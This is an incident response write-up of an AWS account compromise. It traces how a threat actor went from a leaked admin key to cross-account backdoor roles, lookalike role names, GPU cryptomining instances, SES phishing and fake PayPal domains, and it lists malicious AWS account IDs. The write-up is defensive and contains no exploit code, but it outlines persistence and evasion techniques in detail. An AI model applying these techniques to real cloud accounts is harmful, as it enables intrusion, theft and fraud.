The curious case of DangerDev@protonmail.me

January 31, 2024

An AWS incident response story

Recently we worked on a very interesting incident response case in a customer's AWS environment. We would like to share the story of this case in more detail in this blog including the techniques used by the threat actor (TA). In this blog, we want to share a detailed story of this case, including the techniques used by the TA. We hope that this is helpful for people protecting AWS accounts around the world.

Background

It all started on a Friday afternoon when we got a call asking for support with an ongoing AWS incident. The trigger for the incident was a suspicious support case that was created within one of the AWS accounts of our client. The support case wasn’t raised by the client themselves and the reason it triggered an alert from AWS to the client is because it was a request to increase Simple Email Service (SES) sending limits. However our client wasn’t using SES….

Due to client confidentiality we have censored certain information.

SES is a popular target for attackers as it can be abused to send out phishing and spam campaigns at massive rates and from a trusted sender (Amazon). We talked about it before in an incident write-up there’s also an excellent blog on SES abuse by Permiso Security.

Reading Guide

Please consider that cloud attack techniques are challenging to categorize into specific MITRE phases due to their multipurpose nature and the ambiguity of threat actor intent.

For instance, an attacker’s actions related to user activities may fit into the persistence phase, but could also serve to evade defenses by blending in with specific usernames and roles. Additionally, threat actors often move between phases, such as transitioning from traditional persistence activities to subsequent discovery activities with newly created users. The story is written in chronological order.

Incident overview

The malicious activity took places over the course of a month. Within that month there were 3 distinguished phases of activity. We have separated this write-up in the three phases of the attack and used the MITRE ATT&CK framework techniques to categorize our findings.

Phase 1

The support case that triggered the incident response was opened by an IAM user called DangerDev@protonmail.me. According to our client this was not a legitimate user, time to figure out how this all happened. (Tip: Right-click open in new tab for high quality)

Initial access

Access to the environment was achieved through an accidentally exposed long term access key belonging to an IAM user. The access key belonged to a user with Administrator Access. We cannot provide additional details as to where the access key was stored.

Discovery

What do you do if you just received a fresh access key to start your hacking adventure with?

SES discovery

If you think the answer is discovering and enumerating SES you are correct. Repeated calls were made towards SES with GetSendQuota and ListIdentities.These calls are used to get an idea on how much emails can be sent at once and which emails and domains are registered to send emails.

The SES activity occurred on two separate days and was the only observed activity in the first two weeks, which was interesting. In other engagements we have seen that after discovery of an active access key the TA will launch whatever they can immediately before they get kicked out.

User discovery

After approximately two weeks the TA came back and ran ListUsers to list the IAM users in the AWS account.

The discovery commands were most likely automated based on the user-agent and the frequency of the calls performed.

An observation for this phase is that the TA isn’t running the typical enumeration commands like GetCallerIdentity and ListAttachedUserPolicies. This could be because calls like that could trigger detection.

Persistence

After all of the above it’s time for our main character to make an entrance. A CreateUser call was made for a new account DangerDev@protonmail.me.

After this action the TA performed a CreateLoginProfile call which is used to give a user the ability to login through the AWS management console.

Privilege Escalation

The AdministratorAccess policy was attached to the newly created account with AttachUserPolicy. This policy is an AWS managed policy that provides full access to AWS services and resources.

This activity marked the end of the activity with the original IAM user and most of the subsequent activity was performed with the DangerDev user and some new identities will enter this story.

Phase 2

In the second phase of the attack that lasted approximately one week the TA was mostly testing out their access and what kind of activities they could perform within the environment.

Discovery

With the newly created account the TA performed additional discovery activities which were probably closer aligned with their malicious intentions. The following calls were made in less than an hour.

The majority of this activity relates to EC2 instances:

Using the sessionCredentialFromConsole field we can identify activity performed through the AWS management console. Which is quite interesting as it’s less likely this activity was scripted. This example shows a DescribeSecurityGroups event which lists all security groups in the account, which is a nice bridge to the next phase of the attack.

Persistence

After the discovery activity the TA performed the following actions in a timespan of 30 minutes:

  • CreateKeyPair
  • CreateSecurityGroup
  • CreateDefaultVpc
  • AuthorizeSecurityGroupIngress
  • RunInstances

In short what happened was that the TA launched a EC2 instance and as part of that process a VPC with a security group was created. The TA modified the security group to allow for external RDP access as shown below:

We will discuss the EC2 instance creation next, because the TA did something interesting.

Impact

What we saw was that the TA created a test instance first with instance type t2.micro, which is one of the smallest instances and definitely not suitable for crypto mining. It seems the TA wanted to test if they could successfully launch and access their EC2 machine, because shortly after the instance was terminated by the TA.

After this test it was time for the heavy hitters. The TA launched three instances with instance type p3.16xlarge.

This instance type is much better for crypto mining as it has a GPU with 128GB and 64 vCPUs. However, there was a problem with launching the instance, due to account limits.

The other machine launched successfully but was terminated after approximately one hour. After this activity it stayed mostly quiet for another two weeks.

Phase 3

The bulk of the activity took place in the last phase of the attack and some of the actions ultimately led to discovery of the attack.

Persistence & Defense Evasion

The majority of the activities is related to user and role creation or modification. The TA used an interesting technique to achieve persistent access into the AWS account.

User creation

Over the course of this attack the TA performed a number of activities related to users and roles. The graphic below is intended to show you the activities that were performed.

The TA manually created a user account called ses.

The username ses is interesting, because it mimics accounts automatically created when using SES. They can be identified because they all follow the official name convention ses-smtp-user.<date-time> and in the event you can see it’s invoked by SES console

Therefore the creation of an account with the name ses might also be an attempt to evade detection.

Additionally the TA created access keys for existing accounts, due to confidentiality we can’t name the accounts in question. We’ve added an example of this activity for the ses account below.

Role creation

One of the more interesting actions observed in this attack is the creation of a role that allows identities from an external AWS account to assume a privileged role in the victim tenant. Which sounds quite complicated, but this is how it works:

And what it looks like in CloudTrail:

Notice the external AWS account ID and also the roleName. The roleName is AWSLanding-Zones-ConfigRecorderRoles which was very similar to an existing role name.

The second role has the same purpose, but for a different external AWS account it also has a name very similar to an existing role.
AWSeservedSSO_* vs. AWSReservedSSO_*

After the creation of both roles, an AssumeRole event was observed as shown below. The TA assumed the role from their own account (671050157472).

If you see any of these accounts in your environment please reach out to us or start your incident response process as they’re confirmed malicious by AWS:

  • 265857590823
  • 671050157472

We haven’t seen this type of attack technique before, it’s a pretty clever way of establishing backdoor access that doesn’t require an IAM user inside the victim account.

Privilege escalation

In addition to the aforementioned activities such as the creation of users and roles with privileged access the TA performed activities that could be classified as attempts to escalate privileges.

Using AttachRolePolicy the TA added the AWS managed AdministratorAccess policy to the AssumeRole that allows for external access:

Another interesting event is UpdateLoginProfile where the TA uses the initially compromised account to update the console password of another account.

Discovery

In this phase the TA also performed discovery activities such as:

  • ListBuckets
  • ListGroupsForUser
  • ListInstanceProfiles
  • ListSSHPublicKeys
  • SimulatePrincipalPolicy

Most of the above actions are pretty self-explanatory, however we want to highlight SimulatePrincipalPolicy. As this is a technique not reported on before by anyone (or at least we couldn’t find it).

So how does this work, let’s start with the event that is generated first..

The AWS Policy Simulator allows users to test an existing policy recorded in the policySourceArn field against a set of actions recorded in the actionNames field. This helps answer the question can I perform action X with policy Y.

The fact that the TA used this service to test certain actions tells us that they were interested in actions related to the SSM service and AWS Secrets Manager.

Defense evasion

Interestingly enough the TA actor put quite some effort into hiding their traces:

  • Removing IAM users with DeleteUser
  • Cleaning up policies with DetachUserPolicy and DeleteUserPolicy
  • Deactivating long term access keys with UpdateAccessKey
  • Cleaning up long term access keys with DeleteAccessKey
  • Inspecting GuardDuty findings with ListFindingsand GetFindings
  • Creating a LightSail instance upon discovery with CreateInstances

It was interesting to see that the TA modified users and access keys during the attack before they were discovered. It shows that they wanted to stay under the radar for a little longer. We would like to focus on the GuardDuty and LightSail actions as these are less commonly observed and offer some great insights.

GuardDuty

Looking at the GuardDuty related activities, we believe it was one action performed by the TA that resulted in the events below:

What was interesting is the user-agent being Amazon Relational Database Service (RDS) console, it seems that the TA accessed GuardDuty from the RDS console. This is also visible in the ListFindings event which is filtered for findings related to the RDS resources.

LightSail

For those who primarily use EC2 or ECS for compute there’s another compute resource in AWS that threat actors target. It’s often overlooked as it isn’t part of the regular AWS compute offering nor does it integrate with IAM. It’s called LightSail and it’s basically a virtual private server offering.

What happened is that our client started removing access for the TA actor. However, at this point they didn’t yet know that the TA created an access key for another user. So when the TA noticed access was lost to their account they quickly used another account to create a LightSail instance, this resulted in an error because the account wasn’t verified.

Approximately an hour later the request went through successfully and the TA was able to launch a LightSail instance.

The TA accessed the associated RDP settings. Access was soon revoked as the instance was deleted within an hour. We were not able to investigate the LightSail to determine what happened within that hour.

Impact

No story is complete without some impact, in this case there was quite a few things the TA did which gave us some insights into their objectives. Roughly speaking we can categorize these into three actions:

  1. Cryptomining
  2. Phishing and spam through SES
  3. Setting up fake domains for spear phishing and scams

Cryptomining

Luckily it didn’t last long, because this activity closely preceded the initial discovery of the incident. But the TA actor did create several powerful and expensive instances in the AWS account. All of the below instanceTypes have GPU’s enabled and significant CPU power.

The instances weren’t available for investigation and no VPC flow logs were available to perform further analysis.

To access the machines the TA created new inbound rules to allow traffic on port 22:

Phishing and spam through SES

The TA was mostly interested in SES for further malicious activity. We can’t share too many details on the emails that were sent out. However they were mostly aimed at individuals to phish for cryptocurrency exchange credentials and general spam.

What is interesting and what ultimately led to discovery of the incident is that the AWS Trust & Safety team communicated with the TA through a support case. Here’s what happened:

  1. TA requests increase in SES sending quoata (to send more spam)
  2. AWS requests more details
  3. TA responds in the support case
  4. Quota increased by AWS

As part of the SES abuse the TA created the following identities with CreateEmailIdentity.

Most of the domains are targeting Japanese websites, which is pretty interesting in itself in regards to attribution.

Fake domains mimicking PayPal

The TA also knew his way inside Amazon Route 53, four domains were created with RegisterDomain.

There’s no need to guess what these domains were intended to be used for. The domains were short lived and quickly taken offline, which brings us to the end of the malicious activity observed.

The threat actor

We noticed that there’s not a lot of threat intelligence on cloud threat actors. While we were completing this write-up Datadog published an excellent incident write-up which has some overlapping indicators for the ASN and IP addresses used by the TA. We’ve added all the IOCs below, if you’re working for an organization in the TI field and have more information please do reach out.

With that in mind, some observations from our side on the TA:

  • They know their way around AWS they go beyond the basic EC2 abuse and have skills to setup (more advanced) persistence methods;
  • Uses a combination of automation scripts and hands-on keyboard activity. For example the testing and enumeration of AWS access keys was definitely automated as we kept seeing the original access keys being used to make calls on set times. However they also performed lots of activity through the management console;
  • Some OPSEC was observed, as an example the TA didn’t use the GetCallerIdentity command. Which is commonly observed in attacks as it’s basically a whoami for AWS environments. Additionally we didn’t see many failed API calls, which is often an indicator for a less skilled TA trying every possible action;
  • Financially motivated, ultimately their goal seemed to be to perform (spear)phishing for financial gain through PayPal lures and cryptocurrency phishing;
  • The TA was mostly using Indonesian based IP addresses outside of commercial VPN solutions.

Conclusion

We hope you made it this far, we know it’s quite the read, but we believe this is a story worth sharing with all the technical details. There are lessons to be learned from this incident, which we will save for another blog post.

Last but definitely not least, we want to thank our client for allowing us to write this story. Your willingness  to share this information will help others.

Indicators of Compromise